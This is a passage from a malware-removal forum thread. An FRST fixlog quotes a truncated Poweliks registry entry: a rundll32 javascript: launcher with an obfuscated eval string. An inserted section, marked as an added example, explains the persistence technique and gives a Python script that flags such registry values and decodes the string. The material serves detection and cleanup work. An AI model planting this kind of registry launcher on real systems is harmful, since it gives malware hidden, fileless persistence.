Posted 03 August 2014 - 06:40 PM

Still no errant processes or warnings today, so yay for that.  Here is the Fixlog and I will run the ESET Scanner tonight when I'm done with the computer.  The log for that as well as the last FRST scan will be up tomorrow.

~~~

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 02-08-2014
Ran by Ice at 2014-08-03 18:22:24 Run:1
Running from C:\Users\Ice\Desktop
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
HKU\S-1-5-21-3699948125-3592849413-3750068687-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Reboot:

*****************

"HKU\S-1-5-21-3699948125-3592849413-3750068687-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key not found.
"HKU\S-1-5-21-3699948125-3592849413-3750068687-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.


The system needed a reboot.

==== End of Fixlog ====
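
Added example (not part of this thread, and not code from FRST or ComboFix): the fixlist above targets the Poweliks persistence technique. The default value of a LocalServer32 key under a per-user CLSID (HKU\<SID>_Classes\CLSID\...) is set to rundll32.exe with a javascript: URL that loads mshtml, calls RunHTMLApplication and eval()s an obfuscated string. The persistence lives entirely in the registry, which is why file-based scans in this thread came up clean, and dllhost.exe is the COM surrogate, so a hijacked CLSID pointing at such a launcher would explain the repeated dllhost.exe *32 instances described at the top of the thread. The visible fragment epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds is plaintext with every character shifted up by one code point. The Python below parses a .reg-style export, flags LocalServer32 values carrying the launcher indicators, and decodes the shifted string. The embedded export is constructed: the SID and the second, benign CLSID are made up, and the Poweliks value is only the fragment quoted in the Fixlog, with the truncated tail closed off so the line parses. Note that the Fixlog reports "Key not found" for both keys, meaning they were already gone when FRST ran, consistent with the earlier ComboFix run.

```python
"""Flag Poweliks-style LocalServer32 values in a .reg export and decode the
shift-by-one payload.  Added example; not code from this thread, FRST or ComboFix."""
import re

# Constructed sample export.  The SID and the second (benign) CLSID are made up;
# the first value is the fragment quoted in the Fixlog above, with its
# truncated tail closed off so the line parses.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_USERS\S-1-5-21-1111111111-2222222222-3333333333-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32]
@="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";eval(\"epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds\")"

[HKEY_USERS\S-1-5-21-1111111111-2222222222-3333333333-1000_Classes\CLSID\{11111111-2222-3333-4444-555555555555}\LocalServer32]
@="C:\\Program Files\\Example\\Example.exe"
'''

# Substrings that together characterise the rundll32/javascript: launcher.
INDICATORS = (
    "rundll32.exe javascript:",
    "mshtml,RunHTMLApplication",
    "eval(",
)

_KEY_LINE = re.compile(r"^\[(.+)\]$")
_VALUE_LINE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')


def _unescape(s):
    """Undo .reg escaping (backslash-quote and backslash-backslash)."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def parse_reg(text):
    """Return {key_path: {value_name: data}} for the values in a .reg export."""
    entries, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("Windows Registry Editor", ";")):
            continue
        m = _KEY_LINE.match(line)
        if m:
            key = m.group(1)
            entries.setdefault(key, {})
            continue
        m = _VALUE_LINE.match(line)
        if m and key is not None:
            name = "(Default)" if m.group(1) == "@" else _unescape(m.group(1)[1:-1])
            data = m.group(2)
            if data.startswith('"') and data.endswith('"'):
                data = _unescape(data[1:-1])   # REG_SZ; hex(...) data is left as-is
            entries[key][name] = data
    return entries


def find_poweliks_style(entries):
    """List LocalServer32 values whose data carries the launcher indicators."""
    hits = []
    for key, values in entries.items():
        if not key.lower().endswith("\\localserver32"):
            continue
        for name, data in values.items():
            matched = [i for i in INDICATORS if i.lower() in data.lower()]
            if matched:
                hits.append({"key": key, "value": name, "data": data, "indicators": matched})
    return hits


def decode_shift1(s):
    """Reverse the obfuscation in the Fixlog: each character is one code point above the plaintext."""
    return "".join(chr(ord(c) - 1) for c in s)


def decode_hit(hit):
    """Decode every eval("...") string literal found in a flagged value."""
    return [decode_shift1(s) for s in re.findall(r'eval\("([^"]*)"\)', hit["data"])]


if __name__ == "__main__":
    for hit in find_poweliks_style(parse_reg(SAMPLE_REG)):
        print(hit["key"])
        print("  indicators:", ", ".join(hit["indicators"]))
        for decoded in decode_hit(hit):
            print("  decoded:", decoded)
```

On a live host the input is produced with reg.exe export "HKU\<SID>_Classes\CLSID" clsid.reg (the file is written as UTF-16, so open it with encoding="utf-16" before passing the text to parse_reg). Run the export while the dllhost.exe processes are idle, as aharonov advises above, and treat the decoded script as hostile content to read, never to run. The decoder only handles the shift-by-one layer visible in the Fixlog; a real sample may nest further layers inside the decoded script.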

 

 



#9 aharonov (Malware Response Team, 2,441 posts)

Posted 10 August 2014 - 10:01 AM

Ok, looks good. I'm waiting for the ESET log.

#10 aharonov (Malware Response Team, 2,441 posts)

Posted 03 September 2014 - 06:00 AM

Do you still need help?

#11 aharonov (Malware Response Team, 2,441 posts)

Posted 19 September 2014 - 02:40 PM

Due to the lack of feedback, this topic is now closed.

In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.



